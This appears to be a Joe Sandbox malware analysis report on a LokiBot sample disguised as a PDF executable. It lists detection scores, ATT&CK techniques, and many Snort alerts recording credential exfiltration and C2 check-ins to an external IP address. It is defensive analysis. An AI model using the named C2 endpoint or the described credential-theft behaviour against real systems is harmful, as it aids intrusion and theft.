Loading ...

Play interactive tourEdit tour

Analysis Report EDG95320200205005000471_126_953.pdf.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:229741
Start date:13.05.2020
Start time:08:48:04
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 9s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:EDG95320200205005000471_126_953.pdf.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@3/4@117/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 13.5% (good quality ratio 12.9%)
  • Quality average: 76.3%
  • Quality standard deviation: 28.7%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • HTTP Packets have been reduced
  • TCP Packets have been reduced to 100
  • Excluded IPs from analysis (whitelisted): 2.18.68.82
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Remote ManagementValid Accounts1Valid Accounts1Disabling Security Tools1Credential Dumping2Account Discovery1Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionPort MonitorsAccess Token Manipulation11Deobfuscate/Decode Files or Information1Credentials in Registry2Security Software Discovery1Remote ServicesData from Local System2Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesProcess Injection12Obfuscated Files or Information13Input CaptureFile and Directory Discovery2Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingMasquerading11Credentials in FilesSystem Information Discovery13Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationVirtualization/Sandbox Evasion2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion2Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation11Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection12Bash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: EDG95320200205005000471_126_953.pdf.exeAvira: detection malicious, Label: HEUR/AGEN.1046458
Machine Learning detection for sampleShow sources
Source: EDG95320200205005000471_126_953.pdf.exeJoe Sandbox ML: detected

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 4x nop then xor byte ptr [esi], bl
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49749 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49750 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 72.55.186.14:80
